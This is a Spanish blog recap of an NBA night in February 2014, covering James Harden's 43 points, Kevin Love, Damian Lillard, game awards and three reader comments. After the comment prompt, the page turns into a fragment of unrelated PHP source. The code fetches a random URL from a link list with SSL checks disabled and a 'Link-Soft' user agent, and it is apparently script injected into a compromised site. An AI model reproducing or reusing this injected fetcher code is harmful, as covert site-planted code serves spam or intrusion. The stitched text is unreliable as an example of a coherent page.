La Crónica: 43 y a descansar

26 de February de 2014 por TheDeerHunter

Season-high de James Harden. A poco de comenzar Dwight Howard enfilaba el túnel de vestuarios tras un golpe con Cousins y “La Barba” entraba en combustión con 18 puntos seguidos (hasta un total de 22) sólo en el primer cuarto. Alcanzó los 30 al descanso y terminó con 43 el tercer cuarto, cuando se sentó definitivamente a descansar. También había repartido 8 asistencias, robado 3 balones y cogido 2 rebotes. Lo de Howard no fue más que un susto y aún le daba tiempo a firmar un 20-11 y a contribuir al desquicie de Cousins que terminó expulsado (129-103).

En Phoenix Kevin Love volvió a rozar el triple doble y sus compañeros le ayudaron, especialmente Muhammad que cuajó por primera vez un excelente partido. Parece que les está funcionando bien el small-ball y quieren volver a subirse al tren de playoffs. Con esta derrota los Suns se quedan muy expuestos en la 8ª posición del Oeste (110-101). No parece muy lejano el retorno de Eric Bledsoe. Toda ayuda es poca en estos momentos.

El otro nombre propio de la jornada fue el de Damian Lillard que las clavó de todos los colores en Denver, desatascando un partido feote por parte tanto de sus compañeros como de los rivales (100-95). Algo parecido hizo DeRozan en Cleveland (99-93). Los Bulls se llevaron la victoria de Atlanta con un grandísimo trabajo colectivo y dejan a los Hawks en la 8ª plaza de su conferencia al límite del abismo (107-103).

Por su parte, los Wizards supieron sobreponerse a la baja de Nené y sobrevivieron en un bonito partido ante Orlando (106-115) y los Lakers recibieron la palicilla de turno en Indiana con Pau lanzando puyitas al técnico (98-118). Para lo que le queda en el convento… 

PREMIOS

MVP: James Harden anotó 22 puntos en el primer cuarto, 8 en el segundo, 13 en el tercero y en el cuarto… descansó. 43 puntos y 8 asistencias para el escolta de los Rockets en apenas 31 minutos. Kevin Love se quedó cerquita de lograr el 2º triple-doble de su carrera. Masacró a los Suns con 33 puntos, 13 rebotes, 9 asistencias y 2 tapones. Damian Lillard tampoco se quedó muy lejos del triple doble. Sus 31 puntos, 9 asistencias y 7 rebotes tumbaron a los Nuggets.

Rookie: Victor Oladipo plantó a cara los Wizards con 26 puntos y 5 asistencias pero atención que Shabazz Muhammad anotó 20 puntos y capturó 6 rebotes. Disputó todo el último cuarto y colaboró decisivamente en la victoria de los Wolves con 10 puntos y 5 rebotes en este período.

Sorpresa: Aparte de la lógica sorpresa de Shabazz Muhammad, tenemos que destacar los 23 puntos, 4 rebotes, 3 asistencias y 3 robos de Kent Bazemore. Ha llegado y prácticamente se ha convertido en el jefe de los Lakers.

Decepción: En relación con los Lakers el que no pasa por un buen momento es Kendall Marshall. En 18 minutos se quedó sin anotar un solo punto y perdió 4 balones. Wesley Matthews también parece que se haya dado de bruces contra un rookie wall. Falló 12 de los 14 tiros que intentó.

Esfuerzo en vano: Rudy Gay jugó un buen partido (25 puntos con un 10 de 16 en TC y 6 rebotes) pero no pudo hacer nada contra el huracán Harden.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

3 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    ¡Como echaron de menos los Suns a Dragic en los momentos calientes del partido!bien aprovechado por los lobos,era un partido clave -el primero de muchos- para seguir con aspiraciones de PO.Ya era hora que Adelman cambiara algo,aunque con Pek a la vuelta de la esquina habrá que ver si en ese momento seguirán contando con Muhammad.Partidazo el suyo,va a sonar a cachondeo pero parece mucho mayor de lo que es -por el problema de mentir en la edad y eso lo digo- y pasado de peso,aunque parece que eso le beneficia para cargar el rebote.

      Citar

  2. Esteban dice:
    #2

    Y si muhammad era finalmente lo bueno q se suponia? Lo q es no darle chances a ciertos jugadores, debe ser el primer partido q adelman le da minutos y vaya como responde

    Sobre el peso, m?e parecio lo mismo en la liga de verano, no asi cuand estaba en la universidad, quiza engordo luego de la misma

      Citar

  3. Esteban dice:
    #3

    alguien vio a Turner ayer? no es un dios, pero en comparación a Granger que estba amas duro que una barra de hielo, es toda una mejora, al menos en agilidad, y velocidad, los Pacers ganan y muchisimo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>